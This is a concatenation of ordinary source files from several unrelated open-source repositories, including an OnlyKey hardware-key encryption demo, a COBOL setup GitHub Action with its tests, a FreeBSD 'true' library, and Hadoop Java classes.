This allows developers to ensure secure access in special scenarios.
<hr/>
Onlykey's Key Generation is Transparent, Keys are not marked when being generated by Onlykey. This alows Anonymity from other users to hide where the key is being generated or stored.
<hr/>
<!--<a id="NACL.js" href="javascript:void(0);" class="btn btn-primary startTestType">nacl.js</a><br/><br/>-->
<div>
<h3>P256R1</h3>
<div class="d-flex justify-content-center">
<div><a id="P256R1" href="javascript:void(0);" class="btn btn-primary startTestType">P256R1</a> <a id="P256R1-enc" href="javascript:void(0);" class="btn btn-primary startTestType">P256R1 (REQ_PRESS)</a></div>
</div>
</div>
<hr/>
<div>
<h3>CURVE25519</h3>
<div class="d-flex justify-content-center">
<div><a id="CURVE25519" href="javascript:void(0);" class="btn btn-primary startTestType">CURVE25519</a> <a id="CURVE25519-enc" href="javascript:void(0);" class="btn btn-primary startTestType">CURVE25519 (REQ_PRESS)</a><br/><br/></div>
</div>
</div>
<hr/>
Source and Documentation: <a href="https://github.com/trustcrypto/node-onlykey">https://github.com/trustcrypto/node-onlykey</a>
<br/>
Report and issue here: <a href="https://github.com/trustcrypto/node-onlykey/issues">https://github.com/trustcrypto/node-onlykey/issues</a>
<br/>
<div class="col-sm text-center"><a href="https://crp.to/">CryptoTrust LLC</a> © 2022</div>
</main>
<script src="./libs/jquery.js"></script>
<script src="./libs/gun.min.js"></script>
<script src="./libs/sea.js"></script>
<script src="./libs/bootstrap/js/bootstrap.bundle.js"></script>
<script data-main="./libs/setup" src="./libs/require.js"></script>
<script>
$(".startTestType").click(function(){
var _this = this;
require(["./index.js"], function(index) {
index.start(_this.id)
});
})
</script>
</body>
</html>
<|start_filename|>docs/index.js<|end_filename|>
define(function(require, exports, module) {
/* globals $ SEA GUN */
function hex_encode(byteArray) {
return Array.prototype.map.call(byteArray, function(byte) {
return ('0' + (byte & 0xFF).toString(16)).slice(-2);
}).join('');
}
function hex_decode(hexString) {
var result = [];
for (var i = 0; i < hexString.length; i += 2) {
result.push(parseInt(hexString.substr(i, 2), 16));
}
return Uint8Array.from(result);
}
module.exports = {
start: function(testType) {
var bs_modal_dialog = {
confirm: function(title, question, answers, done) {
var m = $(
`<div class="modal" tabindex="-1" role="dialog">
<div class="modal-dialog" role="document">
<div class="modal-content">
<div class="modal-header">
<h5 class="modal-title"></h5>
<button type="button" class="close" data-dismiss="modal" aria-label="Close">
<span aria-hidden="true">×</span>
</button>
</div>
<div class="modal-body"></div>
<div class="modal-footer"></div>
</div>
</div>
</div>`);
m.find(".modal-title").text(title);
m.find(".modal-body").html(question);
for (var i in answers) {
((ans) => {
var b = $(`<button type="button" class="btn btn-primary">${ans}</button>`);
b.click(function() {
m.modal("hide");
done(null, ans);
});
m.find(".modal-footer").append(b);
})(answers[i]);
}
var cancel = $(`<button type="button" class="btn btn-secondary">Cancel</button>`);
cancel.click(function() {
m.modal("hide");
done(true);
});
m.find(".modal-footer").append(cancel);
m.on("hidden.bs.modal", function() {
m.modal("dispose");
m.remove();
});
m.appendTo("body");
m.modal('show');
return m;
}
}
console.log("onlykeyIndex");
require("./dist/onlykey3rd-party.js")(function(ONLYKEY) {
var onlykey;
var pageLayout;
var keyType;
var press_required = (testType.split("-")[1] ? true : false);
if (testType.split("-")[0] == "P256R1") {
keyType = 1; //P256R1
onlykey = ONLYKEY(keyType);
pageLayout = $(require("text!./pageLayout_P256R1.html"));
onlykey.on("status", function() {
var args = [];
for (var i = 0; i < arguments.length; i++) {
args.push(arguments[i]);
}
var s = args.join(" ");
$("#console_output").append($("<span/>").text(s));
$("#console_output").append($("<br/>"));
$("#connection_status").text(s);
});
pageLayout.find("#connect_onlykey").click(function() {
onlykey.connect(async function() {
console.log("onlykey has connected");
pageLayout.find("#connect_onlykey").hide();
pageLayout.find("#connected_onlykey").show();
// pageLayout.find("#derive_public_key").click();
}, async function(status) {
pageLayout.find("#connection_status").text(status);
});
});
pageLayout.find("#derive_public_key").click(function() {
var AdditionalData = $("#onlykey_additional_data").val();
onlykey.derive_public_key(AdditionalData, keyType, press_required, async function(err, ok_jwk_epub) {
if (err) console.log(err);
pageLayout.find("#onlykey_pubkey").val(ok_jwk_epub);
if ($("#encryptKey").val() == "")
$("#encryptKey").val(ok_jwk_epub);
if ($("#decryptKey").val() == "")
$("#decryptKey").val(ok_jwk_epub);
pageLayout.find("#encryptData").val("test");
//$("#encryptBTN").click();
});
});
pageLayout.find("#connect_onlykey").click();
$("#main-container").html(pageLayout);
$("#encryptBTN").click(async function() {
var encData = pageLayout.find("#encryptData").val();
var input_jwk_epub = pageLayout.find("#encryptKey").val(); //.split("")
//onlykey.b642bytes()
var AdditionalData = $("#onlykey_additional_data").val();
onlykey.derive_shared_secret(AdditionalData, input_jwk_epub, keyType, press_required, async function(err, sharedSecret, ok_jwk_epub) {
if (err) console.log(err);
var enc = await GUN.SEA.encrypt(encData, sharedSecret);
//pageLayout.find("#encryptData").val(enc);
pageLayout.find("#decryptData").val(enc);
pageLayout.find("#pills-decrypt-tab").click();
});
});
$("#decryptBTN").click(async function() {
var decData = pageLayout.find("#decryptData").val();
var input_jwk_epub = pageLayout.find("#decryptKey").val();
var AdditionalData = $("#onlykey_additional_data").val();
onlykey.derive_shared_secret(AdditionalData, input_jwk_epub, keyType, press_required, async function(err, sharedSecret, ok_jwk_epub) {
if (err) console.log(err);
//var enc = await SEA.encrypt('shared data', await SEA.secret(bob.epub, alice));
var dec = await GUN.SEA.decrypt(decData, sharedSecret);
pageLayout.find("#encryptData").val(dec);
pageLayout.find("#pills-encrypt-tab").click();
});
});
$("#derive_shared_secrets").click(async function() {
(async function() {
// var key = pageLayout.find("#onlykey_pubkey").val();
var AdditionalData = $("#onlykey_additional_data").val();
onlykey.derive_shared_secret(AdditionalData, JSON.parse($("#sea_test_key").val()).epub, keyType, press_required, async function(err, sharedSecret, ok_jwk_epub) {
if (err) console.log(err);
$("#ok_test_shared_secret").val(sharedSecret);
pageLayout.find("#onlykey_pubkey").val(ok_jwk_epub);
if ($("#encryptKey").val() == "")
$("#encryptKey").val(ok_jwk_epub);
if ($("#decryptKey").val() == "")
$("#decryptKey").val(ok_jwk_epub);
var testSharedSecret = await SEA.secret({
epub: ok_jwk_epub
}, JSON.parse($("#sea_test_key").val()));
$("#sea_test_shared_secret").val(testSharedSecret);
});
})();
});
// (async function() {
// $("#sea_test_key").text(JSON.stringify(await GUN.SEA.pair()))
// })()
}
/*
if (testType == "NACL.js") {
require("./test_nacl.js").start(testType)
}*/
if (testType.split("-")[0] == "CURVE25519") {
keyType = 3; //CURVE25519
onlykey = ONLYKEY(keyType);
pageLayout = $(require("text!./pageLayout_CURVE25519.html"));
onlykey.on("status", function() {
var args = [];
for (var i = 0; i < arguments.length; i++) {
args.push(arguments[i]);
}
var s = args.join(" ");
$("#console_output").append($("<span/>").text(s));
$("#console_output").append($("<br/>"));
$("#connection_status").text(s);
});
pageLayout.find("#connect_onlykey").click(function() {
onlykey.connect(async function() {
console.log("onlykey has connected");
pageLayout.find("#connect_onlykey").hide();
pageLayout.find("#connected_onlykey").show();
// pageLayout.find("#derive_public_key").click();
}, async function(status) {
pageLayout.find("#connection_status").text(status);
});
});
pageLayout.find("#derive_public_key").click(function() {
var AdditionalData = $("#onlykey_additional_data").val();
onlykey.derive_public_key(AdditionalData, keyType, press_required, async function(err, OK_sharedPubKey, keyString) {
if (err) console.log(err);
pageLayout.find("#onlykey_pubkey").val(OK_sharedPubKey);
if ($("#encryptKey").val() == "")
$("#encryptKey").val(OK_sharedPubKey);
if ($("#decryptKey").val() == "")
$("#decryptKey").val(OK_sharedPubKey);
pageLayout.find("#encryptData").val("test");
//$("#encryptBTN").click();
});
});
pageLayout.find("#connect_onlykey").click();
$("#main-container").html(pageLayout);
$("#encryptBTN").click(async function() {
var encData = pageLayout.find("#encryptData").val();
var encryptoToKey = pageLayout.find("#encryptKey").val(); //.split("")
//onlykey.b642bytes()
var AdditionalData = $("#onlykey_additional_data").val();
onlykey.derive_shared_secret(AdditionalData, encryptoToKey, keyType, press_required, async function(err, sharedSecret) {
if (err) console.log(err);
var enc = await GUN.SEA.encrypt(encData, sharedSecret);
//pageLayout.find("#encryptData").val(enc);
pageLayout.find("#decryptData").val(enc);
pageLayout.find("#pills-decrypt-tab").click();
});
});
$("#decryptBTN").click(async function() {
var decData = pageLayout.find("#decryptData").val();
var decryptoToKey = pageLayout.find("#decryptKey").val();
var AdditionalData = $("#onlykey_additional_data").val();
onlykey.derive_shared_secret(AdditionalData, decryptoToKey, keyType, press_required, async function(err, sharedSecret) {
if (err) console.log(err);
//var enc = await SEA.encrypt('shared data', await SEA.secret(bob.epub, alice));
var dec = await GUN.SEA.decrypt(decData, sharedSecret);
pageLayout.find("#encryptData").val(dec);
pageLayout.find("#pills-encrypt-tab").click();
});
});
$("#derive_shared_secrets").click(async function() {
var AdditionalData = $("#onlykey_additional_data").val();
var OK_sharedPubKey = $("#onlykey_pubkey").val();
(async function() {
var ok_pubkey_decoded = onlykey.decode_key(OK_sharedPubKey);
var pair_bob = JSON.parse($("#sea_test_key").val());
var bobPubKey = pair_bob.epub; //<-- hex encoded
var bobPrivKey = pair_bob.epriv; //<-- hex encoded
var bobPubKey_decoded = onlykey.decode_key(bobPubKey); //<-- uint8array
var bobPrivKey_decoded = onlykey.decode_key(bobPrivKey); //<-- uint8array
console.log("bob1", onlykey.encode_key(bobPubKey_decoded));
console.log("bob2", onlykey.encode_key(bobPrivKey_decoded));
console.log("bobs_pair", pair_bob);
var nacl = require("nacl");
//nacl.scalarMult(bob priv key, sharedPub)
var ss = nacl.scalarMult(bobPrivKey_decoded, ok_pubkey_decoded);
// var ss = nacl.box.before(hex_decode(OK_sharedPubKey), bobPrivKey_decoded);
// await onlykey.build_AESGCM(ss)
var Bob_generated_sharedSecret = await onlykey.build_AESGCM(ss); //hex_encode(ss);
console.log("nacl:x25519 Bob_generated_sharedSecret", Bob_generated_sharedSecret);
$("#sea_test_shared_secret").val(Bob_generated_sharedSecret);
onlykey.derive_shared_secret(AdditionalData, bobPubKey, keyType, press_required, async function(err, sharedSecret) {
if (err) console.log(err);
$("#ok_test_shared_secret").val(sharedSecret);
console.log("elliptic_curve25519: bobPubKey: ", bobPubKey);
console.log("elliptic_curve25519: Bob_generated_sharedSecret: ", Bob_generated_sharedSecret);
});
})();
});
// (async function() {
// $("#sea_test_key").text(JSON.stringify(await GUN.SEA.pair()))
// })()
}
}, function(proceed, browser) {
if (browser == "Apple")
bs_modal_dialog.confirm("Continue",
`To continue please click 'Yes' to access OnlyKey via USB`, ["Yes"],
async function(cancel, ans) {
if (ans == "Yes") {
proceed();
}
});
else proceed();
});
}
};
})
<|start_filename|>src/onlykey-fido2/package.json<|end_filename|>
{
"name": "onlykey-fido2",
"version": "1.0.0",
"description": "",
"main": "index.html",
"scripts": {
"serial": "node ./serial.js"
},
"repository": {
"type": "git",
"url": "git+https://github.com/trustcrypto/node-onlykey.git"
},
"author": "",
"license": "ISC",
"bugs": {
"url": "https://github.com/trustcrypto/node-onlykey/issues"
},
"homepage": "https://github.com/trustcrypto/node-onlykey#readme",
"dependencies": {
"@vincss-public-projects/fido2-client": "git+https://github.com/trustcrypto/FIDO2Client.git",
"atob": "^2.1.2",
"btoa": "^1.2.1",
"file-saver": "^2.0.2",
"jszip": "^3.5.0",
"node-forge": "^0.10.0",
"node-webcrypto-shim": "0.0.1",
"optimist": "^0.6.1",
"tweetnacl": "^1.0.3"
}
}
<|start_filename|>build.node-onlykey-cli.js<|end_filename|>
var nexe = require('nexe');
var compile = nexe.compile;
compile({
target: "windows-x64-12.18.2",
input: './src/cli.js',
output: './node-onlykey.exe',
temp: "./.tmp-nexe",
loglevel:"verbose"
}).then(() => {
console.log('done: success')
}) | gitter-badger/node-onlykey |
<|start_filename|>composer.json<|end_filename|>
{
"authors": [
{
"name": "<NAME>",
"email": "<EMAIL>"
}
],
"autoload": {
"psr-4": {
"Jweety\\": "src/"
}
},
"autoload-dev": {
"psr-4": {
"Jweety\\": "tests/"
}
},
"config": {
"sort-packages": true
},
"description": "Simple JWT (RFC 7519) encoding/decoding and validation library, for PHP >= 5.3.",
"homepage": "http://vaibhavpandeyvpz.github.io/jweety",
"keywords": ["jwt", "json web token", "authentication"],
"license": "MIT",
"name": "vaibhavpandeyvpz/jweety",
"require": {
"php": "^5.3||^7.0"
},
"require-dev": {
"phpunit/phpunit": "^5.0||^6.0"
},
"suggest": {
"symfony/polyfill-php56": "For using hash_equals(...) on ancient PHP versions."
},
"type": "library"
}
| vaibhavpandeyvpz/jweety |
<|start_filename|>1-0-java-basics/1-5-0-hello-annotations/src/main/java/com/bobocode/basics/Level.java<|end_filename|>
package com.bobocode.basics;
/**
* Enum that lists all possible exercise complexity levels.
*/
public enum Level {
BEGINNER, BASIC, ADVANCED, CRAZY
}
| zav0dila/java-fundamentals-course |
<|start_filename|>src/index.js<|end_filename|>
const core = require('@actions/core');
const path = require('path');
const { Installer } = require('./installer');
(async () => {
const installer =
new Installer(core.getInput('version'), path.join(__dirname, '../src'));
try {
await installer.install();
} catch (e) {
core.setFailed(e.message);
}
})();
<|start_filename|>.vscode/settings.json<|end_filename|>
{
"editor.codeActionsOnSave": {
"source.fixAll": true,
"fixAll.eslint": true,
"source.organizeImports": true,
"typescript.suggestionActions.enabled": true
},
"cSpell.words": [
"UNSECURE",
"appium",
"autobuild",
"briandk",
"cobc",
"codeql",
"gnucobol",
"issuehunt",
"liberapay",
"markdownlint",
"vercel"
],
"editor.rulers": [ 80 ]
}
<|start_filename|>__tests__/test-installer.js<|end_filename|>
const exec = require('@actions/exec');
const fs = require('fs');
const os = require('os');
const path = require('path');
const { assert } = require('chai');
const itParam = require('mocha-param');
const sinon = require('sinon');
const {
Installer,
UnsupportedOSError,
UnsupportedVersionError
} = require('../src/installer');
const fixture = ['Darwin', 'Windows_NT'];
const validVersion = '3.0-rc1';
const invalidVersion = 'y50pgz2b';
describe('Test Installer class', () => {
let fsChmodSyncStub;
let execExecStub;
let osTypeStub;
beforeEach(() => {
fsChmodSyncStub = sinon.stub(fs, 'chmodSync');
execExecStub = sinon.stub(exec, 'exec');
osTypeStub = sinon.stub(os, 'type');
});
it('should build correct exec file name for Linux OS', () => {
osTypeStub.returns('Linux');
const installer = new Installer(validVersion);
const expected = 'install-cobol-linux.sh';
const actual = installer._execFileName();
assert.equal(expected, actual);
});
itParam('should not build exec file name for ${value} OS', fixture,
(osType) => {
osTypeStub.returns(osType);
const installer = new Installer(validVersion);
try {
installer._execFileName();
} catch (e) {
if (e instanceof UnsupportedOSError) {
return;
}
}
// eslint-disable-next-line new-cap
assert.Throw();
});
it('should install correctly for Linux OS', async () => {
const version = validVersion;
const execFileName = 'install-cobol-linux.sh';
osTypeStub.returns('Linux');
const installer = new Installer(version);
await installer.install();
execExecStub.calledOnceWith(
path.join(__dirname, execFileName),
[version]
);
fsChmodSyncStub.calledOnceWith(path.join(__dirname, execFileName), '777');
});
itParam('should not install for ${value} OS', fixture, async (osType) => {
osTypeStub.returns(osType);
const installer = new Installer(validVersion);
try {
await installer.install();
} catch (e) {
if (e instanceof UnsupportedOSError) {
assert.isTrue(execExecStub.notCalled);
assert.isTrue(fsChmodSyncStub.notCalled);
return;
}
}
// eslint-disable-next-line new-cap
assert.Throw();
});
it('should not install invalid version', async () => {
osTypeStub.returns('Linux');
const installer = new Installer(invalidVersion);
try {
await installer.install();
} catch (e) {
if (e instanceof UnsupportedVersionError) {
assert.isTrue(execExecStub.notCalled);
assert.isTrue(fsChmodSyncStub.notCalled);
return;
}
}
// eslint-disable-next-line new-cap
assert.Throw();
});
afterEach(() => {
sinon.restore();
});
});
<|start_filename|>src/installer.js<|end_filename|>
const exec = require('@actions/exec');
const fs = require('fs');
const Logger = require('./logger');
const os = require('os');
const path = require('path');
class UnsupportedOSError extends Error {
constructor(message) {
super(message);
}
}
class UnsupportedVersionError extends Error {
constructor(message) {
super(message);
}
}
class Installer {
constructor(version, baseDir = __dirname) {
this.version = version;
this.baseDir = baseDir;
this.logger = new Logger('Installer');
this.SUPPORTED_VERSIONS = ['3.0-rc1'];
this.EXEC_FILE_NAME = 'install-cobol-linux.sh';
}
_execFileName() {
const osType = os.type();
if (osType === 'Linux') {
return this.EXEC_FILE_NAME;
}
throw new UnsupportedOSError(
// eslint-disable-next-line max-len
`${osType} is not supported. fabasoad/setup-cobol-action only supports Ubuntu Linux at this time.`
);
}
async install() {
if (!this.SUPPORTED_VERSIONS.includes(this.version)) {
throw new UnsupportedVersionError(
`Version ${this.version} is not supported.`
);
}
const execFileName = path.join(this.baseDir, this._execFileName());
this.logger.info(`Changing permissions to 777 for ${execFileName}...`);
fs.chmodSync(execFileName, '777');
this.logger.info(`Running ${execFileName}...`);
await exec.exec(execFileName, [this.version]);
this.logger.info('Installation successfully finished.');
}
}
module.exports = { Installer, UnsupportedOSError, UnsupportedVersionError };
<|start_filename|>src/logger.js<|end_filename|>
const { createLogger, format, transports } = require('winston');
const { combine, timestamp, label, printf } = format;
class Logger {
constructor(clazz) {
const customFormat = printf(({ level, message, label, timestamp }) => {
timestamp = timestamp.replace(/T/, ' ').replace(/\..+/, '');
return `${timestamp} [${label}] ${level}: ${message}`;
});
return createLogger({
level: 'debug',
format: combine(
label({ label: clazz }),
timestamp(),
customFormat
),
transports: [
new transports.Console()
]
});
}
}
module.exports = Logger;
| fabasoad/setup-cobol-action |
<|start_filename|>src/package.json<|end_filename|>
{
"name": "web-status-monitor",
"version": "1.1.0",
"description": "Ping websites at regular intervals using just GitHub Actions!",
"scripts": {
"start": "ts-node index.ts"
},
"repository": {
"type": "git",
"url": "git+https://github.com/zyrouge/web-status-monitor.git"
},
"keywords": [],
"author": "ZYROUGE",
"license": "MIT",
"bugs": {
"url": "https://github.com/zyrouge/web-status-monitor/issues"
},
"homepage": "https://github.com/zyrouge/web-status-monitor#readme",
"dependencies": {
"@types/fs-extra": "^9.0.7",
"axios": "^0.21.1",
"chalk": "^4.1.0",
"fs-extra": "^9.1.0",
"ts-node": "^9.1.1",
"typescript": "^4.1.5",
"yaml": "^1.10.0"
}
}
| Snzy027/web-status-monitor |
<|start_filename|>libtrue/Makefile<|end_filename|>
# $FreeBSD$
LIB= true
SHLIB_MAJOR= 0
SRCS= true.c
MAN=
.include <bsd.lib.mk>
<|start_filename|>true/Makefile<|end_filename|>
# $FreeBSD$
PROG= true
CFLAGS= -I${.CURDIR:H}/libtrue
LDADD= -L../libtrue -ltrue
OS!= uname
.if ${OS} == "FreeBSD" && exists(/usr/lib/libxo.so)
LDADD+= -lxo
.endif
MAN=
.include <bsd.prog.mk>
<|start_filename|>true/true.c<|end_filename|>
/*-
* Copyright (c) 2017 <NAME>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
*/
#if defined(__FreeBSD__) && (__FreeBSD_version > 1200012)
#define WITH_CAPSICUM
#define WITH_XO
#endif
#if defined(__FreeBSD__) && (__FreeBSD_version > 1100041)
#define WITH_LIBXO
#endif
#include <sys/cdefs.h>
#ifdef WITH_CAPSICUM
#include <sys/capsicum.h>
#include <capsicum_helpers.h>
#endif
#include <err.h>
#include <errno.h>
#ifdef WITH_LIBXO
#include <libxo/xo.h>
#include <locale.h>
#endif
#include <stdbool.h>
#include <true.h>
int
main(int argc, char *argv[])
{
int value;
#ifdef WITH_CAPSICUM
if (caph_limit_stdio() != 0)
errx(1, "Failed to limit std{in,out,err}");
if (cap_enter() != 0 && errno != ENOSYS)
errx(1, "Failed to enter capability mode");
#endif
value = get_true();
#ifdef WITH_XO
(void) setlocale(LC_CTYPE, "");
argc = xo_parse_args(argc, argv);
if (argc < 0)
return (argc);
#endif
#ifdef WITH_XO
xo_open_container("true");
#endif
if (!value) {
#ifdef WITH_XO
xo_errx(1, "Bad true value: %u", value);
#else
errx(1, "Bad true value");
#endif
}
#ifdef WITH_XO
xo_emit("{n:value/%s}\n", value ? "true" : "false");
xo_close_container("true");
xo_finish();
#endif
return (0);
}
| sbz/libtrue |
<|start_filename|>src/mapred/org/apache/hadoop/mapred/JobSubmitInfo.java<|end_filename|>
package org.apache.hadoop.mapred;
import java.io.ByteArrayOutputStream;
import java.io.DataInput;
import java.io.DataOutput;
import java.io.DataOutputStream;
import java.io.IOException;
import org.apache.hadoop.io.Writable;
import org.apache.hadoop.io.WritableFactories;
public class JobSubmitInfo implements Writable {
private boolean useNewAPI;
private SplitInfo[] splitInfos;
private JobConf jobConf;
public JobSubmitInfo(JobConf conf,
org.apache.hadoop.mapred.InputSplit splits[]) throws IOException {
this.jobConf = conf;
this.useNewAPI = false;
setSplitInfos(new SplitInfo[splits.length]);
ByteArrayOutputStream outputStream = new ByteArrayOutputStream();
for (int i = 0; i < splits.length; ++i) {
DataOutputStream dataOutputStream = new DataOutputStream(outputStream);
String className = splits[i].getClass().getName();
splits[i].write(dataOutputStream);
dataOutputStream.flush();
byte[] object = outputStream.toByteArray();
outputStream.reset();
getSplitInfos()[i] = new SplitInfo(className, object, splits[i]
.getLength(), splits[i].getLocations());
}
}
public JobSubmitInfo(JobConf conf,
org.apache.hadoop.mapreduce.InputSplit splits[]) throws IOException,
InterruptedException {
this.jobConf = conf;
this.useNewAPI = true;
setSplitInfos(new SplitInfo[splits.length]);
ByteArrayOutputStream outputStream = new ByteArrayOutputStream();
for (int i = 0; i < splits.length; ++i) {
DataOutputStream dataOutputStream = new DataOutputStream(outputStream);
String className = splits[i].getClass().getName();
((Writable) splits[i]).write(dataOutputStream);
dataOutputStream.flush();
byte[] object = outputStream.toByteArray();
outputStream.reset();
getSplitInfos()[i] = new SplitInfo(className, object, splits[i]
.getLength(), splits[i].getLocations());
}
}
public JobSubmitInfo() {
}
public int getSplitNum() {
return getSplitInfos().length;
}
public TaskSplitInfo[] getTaskSplitInfos() {
TaskSplitInfo[] result = new TaskSplitInfo[splitInfos.length];
for(int i = 0; i < result.length; ++i)
result[i] = new TaskSplitInfo(jobConf, splitInfos[i]);
return result;
}
@Override
public void readFields(DataInput in) throws IOException {
jobConf = new JobConf(false);
jobConf.readFields(in);
useNewAPI = in.readBoolean();
int splitNum = in.readInt();
setSplitInfos(new SplitInfo[splitNum]);
for (int i = 0; i < splitNum; ++i) {
getSplitInfos()[i] = new SplitInfo();
getSplitInfos()[i].readFields(in);
}
}
@Override
public void write(DataOutput out) throws IOException {
jobConf.write(out);
out.writeBoolean(useNewAPI);
out.writeInt(getSplitNum());
for (SplitInfo info : getSplitInfos())
info.write(out);
}
public void setUseNewAPI(boolean useNewAPI) {
this.useNewAPI = useNewAPI;
}
public boolean isUseNewAPI() {
return useNewAPI;
}
public void setJobConf(JobConf jobConf) {
this.jobConf = jobConf;
}
public JobConf getJobConf() {
return jobConf;
}
public void setSplitInfos(SplitInfo[] splitInfos) {
this.splitInfos = splitInfos;
}
public SplitInfo[] getSplitInfos() {
return splitInfos;
}
}
<|start_filename|>src/test/org/apache/hadoop/mapred/TestReduceTaskFetchFail.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.mapred;
import static org.junit.Assert.*;
import java.io.IOException;
import org.apache.hadoop.mapred.Task.TaskReporter;
import org.apache.hadoop.mapred.TaskUmbilicalProtocol;
import org.apache.hadoop.mapred.JobConf;
import org.apache.hadoop.mapred.ReduceTask;
import org.junit.Test;
import static org.mockito.Mockito.*;
public class TestReduceTaskFetchFail {
public static class TestReduceTask extends ReduceTask {
public TestReduceTask() {
super();
}
public String getJobFile() { return "/foo"; }
//
// public class TestReduceCopier extends ReduceCopier {
// public TestReduceCopier(TaskUmbilicalProtocol umbilical, JobConf conf,
// TaskReporter reporter
// )throws ClassNotFoundException, IOException {
// super(umbilical, conf, reporter);
// }
//
// public void checkAndInformJobTracker(int failures, TaskAttemptID mapId, boolean readError) {
// super.checkAndInformJobTracker(failures, mapId, readError);
// }
//
// }
//
// }
//
//
// @SuppressWarnings("deprecation")
// @Test
// public void testcheckAndInformJobTracker() throws Exception {
// //mock creation
// TaskUmbilicalProtocol mockUmbilical = mock(TaskUmbilicalProtocol.class);
// TaskReporter mockTaskReporter = mock(TaskReporter.class);
//
// JobConf conf = new JobConf();
// conf.setUser("testuser");
// conf.setJobName("testJob");
// conf.setSessionId("testSession");
//
// TaskAttemptID tid = new TaskAttemptID();
// TestReduceTask rTask = new TestReduceTask();
// rTask.setConf(conf);
//
// ReduceTask.ReduceCopier reduceCopier = rTask.new TestReduceCopier(mockUmbilical, conf, mockTaskReporter);
// reduceCopier.checkAndInformJobTracker(1, tid, false);
//
// verify(mockTaskReporter, never()).progress();
//
// reduceCopier.checkAndInformJobTracker(10, tid, false);
// verify(mockTaskReporter, times(1)).progress();
//
// // Test the config setting
// conf.setInt("mapreduce.reduce.shuffle.maxfetchfailures", 3);
//
// rTask.setConf(conf);
// reduceCopier = rTask.new TestReduceCopier(mockUmbilical, conf, mockTaskReporter);
//
// reduceCopier.checkAndInformJobTracker(1, tid, false);
// verify(mockTaskReporter, times(1)).progress();
//
// reduceCopier.checkAndInformJobTracker(3, tid, false);
// verify(mockTaskReporter, times(2)).progress();
//
// reduceCopier.checkAndInformJobTracker(5, tid, false);
// verify(mockTaskReporter, times(2)).progress();
//
// reduceCopier.checkAndInformJobTracker(6, tid, false);
// verify(mockTaskReporter, times(3)).progress();
//
// // test readError and its config
// reduceCopier.checkAndInformJobTracker(7, tid, true);
// verify(mockTaskReporter, times(4)).progress();
//
// conf.setBoolean("mapreduce.reduce.shuffle.notify.readerror", false);
//
// rTask.setConf(conf);
// reduceCopier = rTask.new TestReduceCopier(mockUmbilical, conf, mockTaskReporter);
//
// reduceCopier.checkAndInformJobTracker(7, tid, true);
// verify(mockTaskReporter, times(4)).progress();
//
}
}
<|start_filename|>src/core/org/apache/hadoop/security/authentication/server/KerberosAuthenticationHandler.java<|end_filename|>
/**
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License. See accompanying LICENSE file.
*/
package org.apache.hadoop.security.authentication.server;
import org.apache.hadoop.security.authentication.client.AuthenticationException;
import org.apache.hadoop.security.authentication.client.KerberosAuthenticator;
import com.sun.security.auth.module.Krb5LoginModule;
import org.apache.commons.codec.binary.Base64;
import org.apache.hadoop.security.KerberosName;
import org.ietf.jgss.GSSContext;
import org.ietf.jgss.GSSCredential;
import org.ietf.jgss.GSSManager;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import javax.security.auth.Subject;
import javax.security.auth.kerberos.KerberosPrincipal;
import javax.security.auth.login.AppConfigurationEntry;
import javax.security.auth.login.Configuration;
import javax.security.auth.login.LoginContext;
import javax.security.auth.login.LoginException;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.File;
import java.io.IOException;
import java.security.Principal;
import java.security.PrivilegedActionException;
import java.security.PrivilegedExceptionAction;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;
import java.util.Properties;
import java.util.Set;
/**
* The {@link KerberosAuthenticationHandler} implements the Kerberos SPNEGO authentication mechanism for HTTP.
* <p/>
* The supported configuration properties are:
* <ul>
* <li>kerberos.principal: the Kerberos principal to used by the server. As stated by the Kerberos SPNEGO
* specification, it should be <code>HTTP/${HOSTNAME}@{REALM}</code>. The realm can be omitted from the
* principal as the JDK GSS libraries will use the realm name of the configured default realm.
* It does not have a default value.</li>
* <li>kerberos.keytab: the keytab file containing the credentials for the Kerberos principal.
* It does not have a default value.</li>
* <li>kerberos.name.rules: kerberos names rules to resolve principal names, see
* {@link KerberosName#setRules(String)}</li>
* </ul>
*/
public class KerberosAuthenticationHandler implements AuthenticationHandler {
